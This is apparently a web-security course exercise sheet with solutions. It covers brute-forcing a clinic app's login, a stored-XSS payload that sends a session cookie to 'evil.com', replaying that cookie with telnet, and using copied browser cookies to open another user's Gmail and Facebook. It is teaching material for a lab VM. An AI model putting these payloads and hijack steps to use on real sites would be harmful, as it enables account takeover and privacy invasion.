BFH Courses CS Basics (MedInf)

s (MedInf) Web Security

Computer Science Basics

Operating System

# Exercise: Authentication and Session Management (Solution)

### Bruteforce a login system

We have an application: <u>KIS Klinik Sonnenschein</u>. We want to bruteforce the site. **Exercise 1. Automate login tests.** 

Wirte a small php (or java or python, or what you want) program to be run on your laptop. This program must send a request for login, where you can input a username and a password. You must test if the login is valid or not. You can test with the user house. The password is given in Moodle.

#### Solution

We write a python file that can send the login form and test if the page is the right one.

solution\_1\_login.py

#### Exercise 2. Brute force the login

 Modify your program to test with the list of most often used passwords <u>Passwords</u>. Select the list darkweb2017-top100.txt. You will test user bie1.
 Solution We do read the file and test for each of the password if it matches the user bie1.

solution\_2\_list.py

• Modify the previous program, such that you can loop all possible passwords with 4 letters.

Find the password for user taub (this could last for a long time, start the next exercise while waiting for the result).

**Solution** We do loop on a set of characters (since I know the solution, I reduced the set of characters on purpose).

solution\_3\_brute.py

## Access the sessionID cookie

**Exercise 3.** This exercise is to be done in the application for the "*guestbook*" in your Virtual Machine.

- Modify your stored XSS script in order to read the session ID cookie.
- Send the cookie by generating a new *script* node (<script src="https://evil.com/? sessionID=xxxxxx"></script>). You do not need to have such a server, just verify inside the browser that a request has been sent.
  Solution We enter the following string inside the search field.
  <script src=http://192.168.64.2/SoftSec/exercises/authentication/attack.js></script> This loads the file <u>attack.js</u> inside the page.
  We can read inside the HTTP Trafic (in the network monitor of our browser for instance):
  GET /SoftSec/exercises/xss/otherpage.php?search=PHPSESSID=3lbalbiu6leh9t48bqkv0rkluo HTTP/1.1 Host: 192.168.64.2
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:83.0) Gecko/20100101 Firefox/83.0

. . .

Home

Slides

Exemples

Exercices

Resources

Contact

Prof. Dr. Emmanuel Benoist Berner Fachhochschule - TI Quellgasse 21 CH-2501 Biel/Bienne Switzerland Mail: emmanuel.benoist (at) bfh.ch

Social Networks

Follow me on Linkedin, Scholar & Research gate

http://www.ti.bfh.ch/

so the session ID has been sent to the server.

Generate manualy a GET request containing this cookie.
\$ telnet localhost 80
GET /guestbook/ HTTP/1.1
Host: localhost
Cookie: PHPSESSID=3lbalbiu6leh9t48bqkv0rkluo
You see the page. You just verify that the form for sending a message is visible (it is the last form at the bottom of the page).

## **Credentials Theft**

Exercise 4. In Linux the file is placed in the following directory :
/home/username/snap/firefox/common/.mozilla/firefox/rand.profile
Save your file there.
Access to gmail.com. It works Read the emails of the user.
You can also access Facebook with those cookies.

ВАСК ТО ТОР

© 2014-2021 Emmanuel Benoist